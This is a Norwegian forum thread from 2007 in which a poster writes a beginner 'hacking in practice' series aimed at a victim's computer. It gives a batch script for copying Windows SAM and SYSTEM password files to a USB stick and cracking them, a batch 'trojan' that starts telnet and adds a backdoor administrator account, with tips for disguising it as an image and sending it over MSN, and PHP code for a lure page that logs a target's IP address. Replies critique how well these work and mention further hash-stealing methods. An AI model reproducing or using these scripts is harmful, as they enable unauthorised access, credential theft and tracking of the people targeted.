Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  124 25137
Masi
1.093 192
10. mai 2007
[left]Hacking i praksis


Jeg ser det er en god del mennesker som spør hvordan man hacker? Sånt som «non som kan lære mæ å hacke? Please?», det å hacke er ikke bare å trykke på en knapp som det står "hack" på. Så slike spørsmål er vel vi alle lei av. Så jeg bestemte meg for å skrive en liten artikkel om hacking og enkle øvelser man kan starte med.


[/left]
Øvelse 1
Passord må lagres en eller annen plass på datamaskinen, når du skriver inn brukernavn og passord så må datamaskinen kunne sammenligne med noe for å kunne si noe om brukernavn og passord er feil. Men hvor lagres brukernavnene og passordene i Windows XP? Brukernavn og Passord lagres i to filer som heter «SAM» og «System» disse filene ligger i en mappe som heter config, som igjen ligger i system32 mappen. Hvis du prøver å åpne Internet Explorer og skriver følgene adresse inn «C: \WINDOWS\system32\config» og trykker enter så vil det komme opp en mappe med noen filer i, deriblant «SAM» og «System» disse filene vil ikke kunne kopieres på grunn av at dem er låst av en prosess på datamaskinen. Det finnes to måter å få kopiert disse to filene.

For det første så lages det en Backup av disse filene i repair mappen som ligger i Windows Mappen, men hvis dem har endret passordet, så hjelper det lite å kopiere disse filene. For det blir bare laget backup av disse filene engang.
Man kan kopiere disse filene helt enkelt med et lite batch script.

Samkopi.bat

Kode

	
echo off
cls

echo Trykk en tast for aa kopiere SAM og System...
pause>nul

md ..\sam_system

xcopy %systemroot%\repair\sam ..\sam_system
xcopy %systemroot%\repair\system ..\sam_system
Dette lille batch scripte lagrer man på en USB minne, tar med seg til offeret sin PC. Plugg i USB minne og trykker en tast for å kopiere, så vil det ta under et sekund før det ligger en mappe med navnet sam_system på USB minne ditt, da er det bare å trekke ut USB minne og dra hjem for å sluttføre arbeidet.

Den andre måten er å boote fra CD eller andre bærbare enheter, slik som disketter USB minne...osv
Når man booter et annet operativ system så kjøres ikke den prosessen som låser disse to filene, og det gjør at man kan kopiere filene over på USB minne, som man kan ta med seg hjem.

Anbefalte Operativ system som kan brukes til denne operasjonen er Live knoppix CD, Live Ubuntu CD. Men storsett alle Operativ systemer kan brukes til denne operasjonen, eneste som kreves av operativ systemer er at den kan bootes fra en Live CD, eller andre bærbare enheter og at den støtter NTFS partisjon, dette med tanke på at den skal kunne lese partisjonen som Windows er installert på.

Når Live Cden er ferdig med å boote så kan man leite seg fram til config mappen, og kopiere «SAM» og «System» filene over på en bærbar enhet som man kan ta med seg hjem.

For å sluttføre arbeidet, så trenger man et program som kan lese disse filene, og finne passordet. Til dette så kan man bruke enten brute force programmer eller Rainbow tables. Her tar vi for oss Brute force så skal jeg komme tilbake til Rainbow Tables ved en senere anledning.

For å kjøre et Brute force angrep så kan man bruke programmet Proactive Password Auditor (PPA), man starter Proactive Password Auditor og velger «registry files (SAM, system)» og trykke «Dump», da vil det komme opp en boks der man skal finne fram SAM og system filene du har vært og hentet fra offeret sin PC, når du har funnet fram filene skal du trykke dump en gang til. Nå henter den informasjon fra filene, og behandler den.
For å starte crackingen av passordet må du hake av de brukeran som du ønsker passordet til, og trykke «start recovery». Dette kan ta en god stund siden programmet setter sammen tilfeldige tegn, og lager det om til en hashe som den sammenligner med den som er i SAM filen.
Dette var øvelse nr 1, jeg kommer tilbake med flere øvelser når jeg for tid til å skrive.

Linker:
Proactive Password Auditor
Knoppix Live CD
Sist endret av Masi; 10. mai 2007 kl. 21:48.
Goda
..
1.959 349
10. mai 2007
Meget bra innlegg!
Ser gjerne at du fortsetter i samme serien, var ganske interessant lesing.
Faen brute-forcing tar tid
sptz
Ministry of Love
sptz's Avatar
2.269 299
10. mai 2007
Masi flott det du skriver, men ikke regn med at det hjelper stort på folk som spørr "lææær meggg åå hakke!!!!!1111!" Siden jeg har nemmelig minst to ganger tidligere skrevet guider som tar for seg windows xp passord, uten at det har hjulpet noe som helst

Det som hadde vært intressant nå er jo Windows Vista, XP er liksom bare tre ord på google unna.

duxo bruk ordlister først da...
Sist endret av sptz; 10. mai 2007 kl. 21:22.
Masi
Trådstarter
1.093 192
10. mai 2007
Sitat av duxo
Meget bra innlegg!
Ser gjerne at du fortsetter i samme serien, var ganske interessant lesing.
Faen brute-forcing tar tid
Vis hele sitatet...
Joda, jeg skal nok fortsette i samme serien. Men jeg har et problem, å det er tiden
Når jeg for tid, så kommer det nok flere slike innlegg.

Sitat av spetznaz
Masi flott det du skriver, men ikke regn med at det hjelper stort på folk som spørr "lææær meggg åå hakke!!!!!1111!" Siden jeg har nemmelig minst to ganger tidligere skrevet guider som tar for seg windows xp passord, uten at det har hjulpet noe som helst

Det som hadde vært intressant nå er jo Windows Vista, XP er liksom bare tre ord på google unna.

duxo bruk ordlister først da...
Vis hele sitatet...
Dette er bare starten som sakt. Jeg skal prøve å samle øvelser i første posten, så da er det greit å starte med Windows Passord. Så for vi se.
Sist endret av Masi; 10. mai 2007 kl. 21:24.
3RD
3RD's Avatar
1.037 199
10. mai 2007
Et lite "newbie" spørsmål:

Slik jeg forsto det; Når .bat filen åpnes fra en usb stick (eksempel) så tar det scriptet å kopierer SAM og System filene over til usb sticken? Eller tuller jeg helt nå?


Ellers en veldig bra guide
Same i Skauen!
Same i Skauen!'s Avatar
548 2
10. mai 2007
Bra skrevet, Masi! Har lyst til å virkelig sette meg en del dager foran dataen og lære meg å hacke!
Bare disse jævla eksamene kan bli ferdig...
Masi
Trådstarter
1.093 192
10. mai 2007
Sitat av Mister_Kenneth
Slik jeg forsto det; Når .bat filen åpnes fra en usb stick (eksempel) så tar det scriptet å kopierer SAM og System filene over til usb sticken? Eller tuller jeg helt nå?
Vis hele sitatet...
Neida, det batch scripte vil kopier filene over til den plasseringen som batch scripte ligger på. Hvis batch scripte ligger på en USB minne så vil det kopiere filene over på USB minne.
Goophy
pls
Goophy's Avatar
4.629 1.276
10. mai 2007
Bruk heller $SYSTEMROOT eller hva variabelen for windowmappa er.
Ikke alle som har c eller windows\.
Masi
Trådstarter
1.093 192
10. mai 2007
Sitat av Goophy
Bruk heller $SYSTEMROOT eller hva variabelen for windowmappa er.
Ikke alle som har c eller windows\.
Vis hele sitatet...
Du mener %systemroot%

EDIT: Jeg har rettet det opp.

Kode

echo off
cls
echo Trykk en tast for aa kopiere SAM og System...
pause>nul
md ..\sam_system
xcopy %systemroot%\repair\sam ..\sam_system
xcopy %systemroot%\repair\system ..\sam_system
Sist endret av Masi; 10. mai 2007 kl. 21:49.
jokke2
131 6
10. mai 2007
Masi - Av alle guidene jeg har lest om sam så er den en av de beste/enkleste jeg har lest. Bra forklart, håper du fortsetter med flere leksjoner

Men liten spm når jeg prøver å dump ifra Proative password autitor og finner sam fila i usb pinnen så står det: SAM Registry file name is empty! Please enter a valid name
Sist endret av jokke2; 10. mai 2007 kl. 22:40.
Masi
Trådstarter
1.093 192
10. mai 2007
Det kan hende du må bruke store bokstaver SAM, eller motsatt. Det er så lenge siden jeg har gjort noe slikt. Filen skal ikke ha no filnavn, bare SAM
jokke2
131 6
10. mai 2007
Jeg fikk det til nå, måtte gjøre det litt anderledes enn det du skreiv. Men finnes det måter å cracke de hvis de er disabled? På min pc har jeg disabla Admistrator og gjest konto de går ikke an å huke av pga de er disabled
Sist endret av jokke2; 10. mai 2007 kl. 23:43.
kakebak
232 9
10. mai 2007
Jeg fåreslår og gjøre denne til en sticky
m0b
m0b's Avatar
DonorAdministrator
5.008 3.420
10. mai 2007
Å poste en tråd om noe av det mest elementære og eldste trikset i boka kvalifiserer ikke til å gjøre en tråd sticky, dessverre.
kakebak
232 9
10. mai 2007
Jaha...så det er bedre at denne posten havner bakerst i postrekka så vi får en flod av nye «non som kan lære mæ å hacke? Please?»...bare en forslag tho
Sist endret av kakebak; 10. mai 2007 kl. 23:49.
m0b
m0b's Avatar
DonorAdministrator
5.008 3.420
10. mai 2007
kakebak: Slike poster ser normalt sett ikke dagens lys etter å ha blitt slettet.
Goophy
pls
Goophy's Avatar
4.629 1.276
10. mai 2007
Sitat av kakebak
«non som kan lære mæ å hacke? Please?»
Vis hele sitatet...
Hvordan svarer denne tråden på det spørsmålet egentlig?
kakebak
232 9
10. mai 2007
Jeg refererte bare til trådstarter...men uansett jeg skjønner poenget
Goophy
pls
Goophy's Avatar
4.629 1.276
10. mai 2007
http://ophcrack.sourceforge.net/ > denne tråden uansett, om man synes det er überbarskt å cracke wintendo-passord.
boblehest
boblehest's Avatar
1.923 229
11. mai 2007
Grei tutorial, men de fleste som spør "Hvordan hacker jeg pcen til han som kalte meg homo på skolen?????" leter etter tutorial på hvordan de får tilgang til en annen pc over internett, noe som de kan glemme om de ikke vil arbeide lenge for å lære det godt, eller så kan de prøve å laste ned lame tools som gjør arbeidet for de, men da faller de under en tittel som ingen liker (scriptkiddie), og jeg håper mange der ute skriver tools som infiserer brukerens pc selv med virus og dritt, bare som et budskap.

Og i batch scriptet, hvordan vet du at .bat fila ikke allerede er lokalisert i root mappen på minnepennen? (Siden du lager sam_system i parent mappen til .bat filen)
Er jo mulig jeg misforstår, siden jeg ikke er en aktiv bruker av batch, men regner med at den bruker standard syntax på normale ting som det.
Masi
Trådstarter
1.093 192
11. mai 2007
Jeg tar gjerne i mot tips om hva jeg bør skrive om, men jeg så en tråd for noen dager siden om akkurat dette, og tenkte enda en tråd om dette temaet. Men jeg kan ta for meg Nettverks hacking neste gang, hvis det er det dere ønsker å lese om.

Men det handler om å starte en plass for enkelte, og som sikkert har sett så er det noen som lærte noe av denne tråden
sptz
Ministry of Love
sptz's Avatar
2.269 299
11. mai 2007
Masi jeg har jo allerede foreslått Vista, har jeg ikke?
Masi
Trådstarter
1.093 192
11. mai 2007
Sitat av spetznaz
Masi jeg har jo allerede foreslått Vista, har jeg ikke?
Vis hele sitatet...
Dessverre har ikke jeg noe særlig kjennskap til vista. Så det kommer til å bli vanskeligt å skrive om noe man ikke kan. Hvis æ for en mnd på å utforske så skal jeg vel klare å komme med noe
Carrier Return
Carrier Return's Avatar
294 132
11. mai 2007
Det å lære seg hacking gjør man ikke ved å lese masse slike innlegg, selv om Masi skal ha kred for at han gidder.

Akkurat som man ikke lærer å overleve i skogen ved å lese om at man må "huske varme klær", "lag bål" osv.

Man må oppleve hva varme klær vil si, hvordan man tenner et bål i mange forskjellige sammehenger.

Med hacking så må man først lære seg hvordan forskjellige operativsystemer oppfører seg. Deretter må man lære seg hvordan man kan benytte forskjellige applikasjoner til å få operativsystemet til å gjøre ting, og man må skjønne hvorfor operativsystemet gjør de tingene det gjør. Så må man basert på denne kunnskapen og erfaringen tenke seg ut scenarier der man kan få operativsystemet til å gjøre ting det ikke var tiltenkt. Det trenger ikke nødvendigvis være sikkerhetsrelatert, men man kan utvikle egne applikasjoner som gir deg ny funksjonalitet.

Når man begynner å få grep rundt dette, kan man svinge innom milw0rm eller packetstorm og titte litt på forskjellig exploit kode som ligger der. Basert på det man nå kan fra før bør man kunne lese seg til hvordan slik kode fungerer, og hva de går etter. Prøv gjerne å tweak koden til å gjøre ting man selv vil få til.

Nå begynner man å nærme seg noe...
Masi
Trådstarter
1.093 192
11. mai 2007
Sitat av Carrier Return
Akkurat som man ikke lærer å overleve i skogen ved å lese om at man må "huske varme klær", "lag bål" osv.

Man må oppleve hva varme klær vil si, hvordan man tenner et bål i mange forskjellige sammehenger.
Vis hele sitatet...
Før man kan tenne bål så må noen vise deg hvordan man tenner bål, det hjelper ikke å kjenne vedkubbene inn og ut og tro at man for noe bål. Og i tillegg så må dem vite hvilken verktøy dem skal bruke, fystikker? steiner?

Det hjelper ikke å kjenne vedkubbene inn og ut hvis ingen viser deg hvordan det gjøres.
Carrier Return
Carrier Return's Avatar
294 132
11. mai 2007
Sitat av Masi
Før man kan tenne bål så må noen vise deg hvordan man tenner bål, det hjelper ikke å kjenne vedkubbene inn og ut og tro at man for noe bål. Og i tillegg så må dem vite hvilken verktøy dem skal bruke, fystikker? steiner?

Det hjelper ikke å kjenne vedkubbene inn og ut hvis ingen viser deg hvordan det gjøres.
Vis hele sitatet...
Jepp.
Litt av poenget mitt når det gjaldt at man først lærte seg å forstå operativsystemer, og deretter lærte seg å få dem til å gjøre ting man selv vil.
Masi
Trådstarter
1.093 192
14. mai 2007
Først må æ bare si at det gikk ikke å ha alle øvelsene i samme post slik jeg hadde tenkt meg, pga at innlegget stenges for redigering etter 60 min.

I denne øvelsen skal vi ta for oss hvordan man lager en enkel trojane
og hvordan man bruker den. En trojane er et lite program som utgir seg
for å være noe annet enn den egentlig er, ofte så utgir den seg for å
være et godt program som skal fjerne virus og andre programmer fra
maskinen, og derfor godtar ofte brukeren programmet, når programmet
har kommet inn på maskinen og blitt godtatt så vil den begynne og åpne
porter og tjenester som gjør det muligt for andre i å komme inn på
maskinen.

For å komme oss inn på en datamaskin må man ha en tjeneste man kan
bruke, i denne øvelsen skal vi bruke telnet for å få «kontroll» over
maskinen. Og for at vi skal kunne bruke telnet så trenger vi å starte
telnet-tjenesten på den maskinen vi skal bruke.
Trojanen vi skal bruke er et lite batch script.

trojane.bat

Kode

echo off
cls
net start telnet
net user /add reg
net user reg passord
net localgroup administratorer /add reg
exit
Man kan også utvide denne trojanen slik at den kopierer nircmd.exe inn
i windows mappen. Nircmd er en videreutvikling av cmd som lar deg få
nye fuksjoner sånt som å skru av skjermen, åpne og lukke cdrommet,
kontrollere lyden på maskinen. Osv.
For å kopiere nircmd.exe inn i windows mappen så bruker vi kommandoen
xcopy ..\nircmd.exe %systemroot%

Kode

echo off
cls
net start telnet
xcopy ..\nircmd.exe %systemroot%
net user /add reg
net user reg passord
net localgroup administratorer /add reg
exit
Denne trojanen lager også en bruker som man kan bruke når man skal koble til med telnet.

En annen ide er å endre navnet på filen slik at den ikke heter
trojane.bat, for det er vel ikke så mange som vil godta en fil som
heter trojane? Kall den f.eks kultbilde.jpg.bat.

Det finnes mange måter å få denne filen inn på offeret sin maskin, man
kan enten sende den over MSN, eller man kan prøve å sette den i
oppstartsmappen, slik at når brukeren logger på så starter trojanen.
Når du er sikkert på at trojanen har kjørt på maskinen så trenger du
IP-adressen eller datamaskinnavnet til offeret, etter det kan du
starte opp telnet og koble til maskinen, det enkleste er å koble til
en maskin i samme nettverk, det på grunn av at hvis man skal koble til en maskin over internett så vil det ikke bare være å åpne telnet tjenesten men også telnet portene på modemet.

For å koble til med telnet så bruker du følgende kommando «telnet
IP/datamaskin navn». Du vil få spørsmål om brukernavn og passord. Brukernavnet er «reg» og passordet er «passord».

Her fra kan du utforske selv, hvis du ønsker hjelp kan du skrive «help», hvis du ønsker en liste over kommandoer i nircmd kan du besøke http://www.nirsoft.net/utils/nircmd.html

Linker
Nircmd download
Nircmd kommandoer
Trojansk hest - Wikipedia
Sist endret av Masi; 14. mai 2007 kl. 18:50.
BoinTjau
431 34
14. mai 2007
Den var nice Takk skal du ha, litt morro å spøke litt uskyldig med kamerater.

Mvh
BoinTjau
Goophy
pls
Goophy's Avatar
4.629 1.276
14. mai 2007
Hvordan i all verden skal man klare å starte en telnet-server på en normal windows-installasjon?

Kan du ikke heller bare prøve å skrive noe ordentlig? Hiv inn noe eksempel-kode i C eller hva du enn vil på noe som faktisk er et trojan. Payloads i batch funker dårlig.
Masi
Trådstarter
1.093 192
14. mai 2007
Sitat av Goophy
Hvordan i all verden skal man klare å starte en telnet-server på en normal windows-installasjon?

Kan du ikke heller bare prøve å skrive noe ordentlig? Hiv inn noe eksempel-kode i C eller hva du enn vil på noe som faktisk er et trojan. Payloads i batch funker dårlig.
Vis hele sitatet...
Hvordan man skal klare å starte en telnet server på en normal windows installasjon? åpne opp cmd skrive services.msc og finne telnet nedover listen?

Også trur jeg du har misforstått poenget mitt, dette er bare for å vise hvordan man enkelt kan lage en trojane, jeg tviler også sterkt på at noen kommer til å gå på den batch trojanen, siden man kan se kommandoene. Hvis man ønsker så kan man jo kjøre den batch filen i Iexpres så ser man ikke kommandoene.

Poenget med denne posten er få disse "små hackerene" som ikke kan en sjitt om hacking å forstå fremgang metodene for hacking, det hjelper lite å starte med C koder for folk som aldri har vært borti programmering eller hacking.
Hvis man kan C så vil jeg tro at dette bare er barnemat for dem. Dem som kan C har mye mer kunnskaper enn målgruppen jeg sikter til.
jokke2
131 6
14. mai 2007
Er det mulig å få bytta ikone på bat fila?
3RD
3RD's Avatar
1.037 199
14. mai 2007
Sitat av jokke2
Er det mulig å få bytta ikone på bat fila?
Vis hele sitatet...

Prøv: høyre klikk --> egenskaper --> endre ikon.

Det er sånn i windows
jokke2
131 6
14. mai 2007
Testa med en kompis stod bare: Kan ikke åpne en tilkobling til vert, på port 23 : kan ikke koble til. Rimelig sikker han åpna den, han fortalte meg, vi blei enige om å teste. han sa noe poppa opp raskt og gikk vekk igjen.. Hmm
Sist endret av jokke2; 14. mai 2007 kl. 22:58.
Goophy
pls
Goophy's Avatar
4.629 1.276
14. mai 2007
Selvfølgelig ikke, man kan ikke starte en telnet-server i wintendo via kun en .bat-fil.
jokke2
131 6
14. mai 2007
trodde man kunne med denne koden koble til telnet serveren på offeren
vidarlo
Trigonoceps occipita
vidarlo's Avatar
Donor
27.682 31.077
14. mai 2007
Sitat av Goophy
Selvfølgelig ikke, man kan ikke starte en telnet-server i wintendo via kun en .bat-fil.
Vis hele sitatet...
Tja, det kan du faktisk, dersom brukeren er admin... Er brukeren admin og han kjører din kode er han eigd omtrent uansett.

Noko heilt anna er at >90% sitter sikkert bak en DSL-ruter, som neppe har port 23 ruta inn mot den pcen dei sitter på. Dermed er den i praksis verdiløs.

I tillegg til at dei sitter bak NAT-enhet slik at telnetporten er utilgjengelig utenifra, så har en del software brannmur i tillegg.

Så alt i alt: Ville bli forundra om den "exploiten" der funka på over 1% av brukerane.

Den gir heller ikkje tilbakemelding til deg om deira IP, så det der er med respekt å melde ikkje snakk om hacking, men å finne en høvelig idiot som er dum nok til å følge en tre-siders instruks du gir på msn for korleis du skal eige han.

Einig med Goophy. Den tutorialen der er 99.5% verdiløs, fordi den aldri kan funke IRL. Batch-programmering er bare tøft dei to første ukene.
jokke2
131 6
14. mai 2007
hehe intressant. Er ikke rart det ikke funket hos han, ergo verdiløs, men ellers en bra guide.
Hadde vært kjekkere om det var en guide som funka for å koble til telnet
Sist endret av jokke2; 14. mai 2007 kl. 23:15.
Masi
Trådstarter
1.093 192
14. mai 2007
Sitat av Masi
det enkleste er å koble til
en maskin i samme nettverk, det på grunn av at hvis man skal koble til en maskin over internett så vil det ikke bare være å åpne telnet tjenesten men også telnet portene på modemet.
Vis hele sitatet...
Hvis dere leser hele posten så vil det komme frem en del ting, sånt som at dette ikke vil fungere spesielt godt over internett, pga brannmurer, modem....osv

Dette vil fungere best på lokalt nettverk.
Acin
291 0
15. mai 2007
net start telnet kommandoen gir bare feilmelding, jeg tror ikke at man kan starte en telnetserver i cmd, vertfall ikke i home edition.

Og i xp proff er det disablet som standard, noe som gjør det umulig å starte ved hjelp av den .bat filen.
Sist endret av Acin; 15. mai 2007 kl. 23:36.
Carrier Return
Carrier Return's Avatar
294 132
16. mai 2007
Litt av tanken her er nok at dere skal få en forståelse for hva slags funksjoner en trojaner eller et rootkit må inneha.
Hvis ikke telnet starter slik dere vil, finn ut noe som gjør det? netcat f.eks.?

Bli nysgjerrig om noe ikke fungerer, og se om man finner andre løsninger på utfordringen rundt konnektivitet.

Et virkelig rootkit inneholder nettkode og åpner egne sockets for å kommunisere. Det vi fikk presentert over var et enkelt eksempel som beviser grunnleggende funksjoner, og som nok var mer ment som en illustrasjon enn en standard for hvordan dere skal gjøre ting...

Vær nysgjerrig = bedre hacker.
kalleklovn2
5 1
20. mai 2007
Hei eg prøvde ut den hacking praksis på side2 du har laget men,eg får det isje helt til og fungere får bare opp masse feilmeldinger her :S kan du si ka eg gjør feil?
esl
twist?
esl's Avatar
1.601 121
20. mai 2007
Hva slags feilmeldinger ? : - )
Deezire
Tastaturkriger
Deezire's Avatar
5.279 2.045
20. mai 2007
Masi, har du i det hele tatt skrevet og funnet opp dette selv? Eller er det bare ting du har lest og skrevet det om med egne ord? Noen få googlesøk tilsier nok mest det siste!
Masi
Trådstarter
1.093 192
20. mai 2007
Sitat av Deezire
Masi, har du i det hele tatt skrevet og funnet opp dette selv? Eller er det bare ting du har lest og skrevet det om med egne ord? Noen få googlesøk tilsier nok mest det siste!
Vis hele sitatet...
Kan du kanskje dokumentere de google søkene dine? Men uansett mesteparten av det jeg skriver henter jeg hodet.

Men jeg vil først og fremst se dokumentasjon av google søkene dine, få et par linker du
super
super's Avatar
519 41
22. mai 2007
hva mener ppa med at jeg bare kan "You can recover password of user “Eier” only using NTLM attack"?

edit: jeg fant det ut, jeg måtte bare velge ntlm attack fra attack list. hehe sorry my bad
Sist endret av super; 22. mai 2007 kl. 12:35.
Syntaxe
1 0
22. mai 2007
Må man ikke være på en bruker på maskinen får og urføre dette?
Masi
Trådstarter
1.093 192
22. mai 2007
Sitat av Syntaxe
Må man ikke være på en bruker på maskinen får og urføre dette?
Vis hele sitatet...
Utføre hva? Hente SAM og system filene eller bruke en enkel telnet trojane? Svaret er vel både ja og nei, det er to måter å hente SAM og system filene på, enten ved å hente dem fra repair mappen eller ved å boote en Live CD. Når man henter fra repair mappen så må man ha en bruker som har rettigheter til denne mappen, men som sakt så oppdateres ikke disse filene ettersom man endrer/legger til/sletter brukernavn og passord.

Når man booter fra en Live CD så trenger man ikke bruker på maskinen for å utføre denne oprasjonen.

Hvis du tenker på den trojanen så må man ha bruker på den PCen man utfører fra, og hvis man ikke klarer å få trojanen på andre måter inn på maskinen så må man ha bruker på offeret sin PC også. Som sakt så er ikke dette noe særlig godt trojane med tanke på at det er vanskelig å kjøre den over internett, funker kun på Windows XP pro (er ikke sikker me home) og at det er åpne kildekoder. Man kan gjerne kjøre den igjennom iExpress for å skjule kildekodene men det hjelper lite.

Men det er et eksempel som beskriver hva en trojane er nokså enkelt og godt.
Carrier Return
Carrier Return's Avatar
294 132
23. mai 2007
Sitat av Masi
det er to måter å hente SAM og system filene på, enten ved å hente dem fra repair mappen eller ved å boote en Live CD.
Vis hele sitatet...
Exploits mot lsass prosessen i windows gir deg les tilgang til SAM.
Husk at windows også sender hashene over SMB når den mounter eksterne disker, så å sniffe disse kan også gi deg hasher.
Masi
Trådstarter
1.093 192
23. mai 2007
Det finnes mange måter å få IP-adressen til offeret, man kan bruke et PHP script til dette. Her skal vi ta for oss et PHP script som lagrer IP adressen med navn og ID.

Last opp følgende filer opp på FTP serveren

Index.php

Kode

<?php
	// Inkludere variabel filen.

	include("var.inc.php");

	// Inkludere body filen.

	include("$fil_body");

	// Behandler innkommende data og lagrer det.

	$fil_id = fopen("userid/$var_userid.txt", "a+");
	fwrite($fil_id, " $var_ip");
	fclose($fil_id);
?>
stil.css

Kode

[size=2][font=Courier New, monospace]* {
	margin:0px;
	padding:20px;
}

html, body {
	background:#666666;
}

#wrap {
	width:auto;
	height:auto;
	
	border:1px solid #000000;
	margin:0 auto;
	padding:10px;

	background:#fbe8c7;
}

#bilde {
	width:auto;
	height:auto;
	
	border:1px solid #999999;
}[/font][/size]
var.inc.php

Kode

<?php
	// Filer

	$fil_stilark = 'stil.css';
	$fil_index = 'index.php';
	$fil_body = 'body.inc.php';
	$fil_bilde = 'Plassering/navn.filtype';

	// Variabler

	$var_userid = $_GET['bilde'];
	$var_ip = $_SERVER['REMOTE_ADDR'];


	$var_title = 'Nettleser tittel';
	$var_tekst = 'Tekst som skal stå under bildet';
?>
body.inc.php

Kode

<?php
	echo "<html>";
		echo "<head>";
			echo "<title>$var_title</title>";
			echo "<link rel='stylesheet' type='text/css' href='$fil_stilark'>";
		echo "</head>";

		echo "<body>";
			echo "<div id='wrap'>";
				echo "<img src='$fil_bilde' id='bilde' >";
				echo "$var_tekst";
			echo "</div>";
		echo "</body>";
	echo "</html>";
?>
generator.php

Kode

<?php
	// Inkludere Variabel filen

	include("var.inc.php");

	// Generer kode og lager fil.

	$fil_teller = fopen("teller.txt", "r");
	$var_teller = fread($fil_teller, "2");
	fclose($fil_teller);

	$var_kode = var_teller + 14 * 32 + 2;

	$var_teller = $var_teller + 1;

	$fil_teller = fopen("teller.txt", "w+");
	fwrite($fil_teller, "$var_teller");
	fclose($fil_teller);

	$var_username = $_POST['navn'];
	$fil = fopen("$var_kode.txt", "w+");
	fwrite($fil, "$var_username ");
	fclose($fil);

	echo "index.php?bilde=$var_kode";
?>
lag.php

Kode

<?php
	echo "<html>";
		echo "<head>";
			echo "<title>$var_title</title>";
			echo "<link rel='stylesheet' type='text/css' href='$fil_stilark'>";
		echo "</head>";

		echo "<body>";
			echo "<div id='wrap'>";
				echo "Navn: ";
				echo "<form action='generator.php' method='post'>";
					echo "<input type='text' name='navn'>";
					echo "<input type='submit' value='Generer'>";
				echo "</form>";
			echo "</div>";
		echo "</body>";
	echo "</html>";
?>
Det eneste du trenger å gjøre er å laste opp disse filene opp på en FTP server. I tillegg så må du endre tittelen på siden og legge inn et bilde, begge deler gjør du i var.inc.php

For å generere en ID så går man på /lag.php og skriver inn navnet, og trykker generer, da skal man få ut en kode som ser ca sånn ut index.php?bilde=450, sett til adressen til server du bruker og send det til offeret. Www.microsoft.com/index.php?bilde=450
Når offeret går inn på linken så vil vedkommende se bilde, i tillegg til at IP-adressen blir lagret.

For å finne igjen IP-adressen så går man bare inn på FTP serveren og åpner de filene som har tall foran og ender på .txt

450.txt

Kode

Christian 
151.25.124.54
1 2 3 >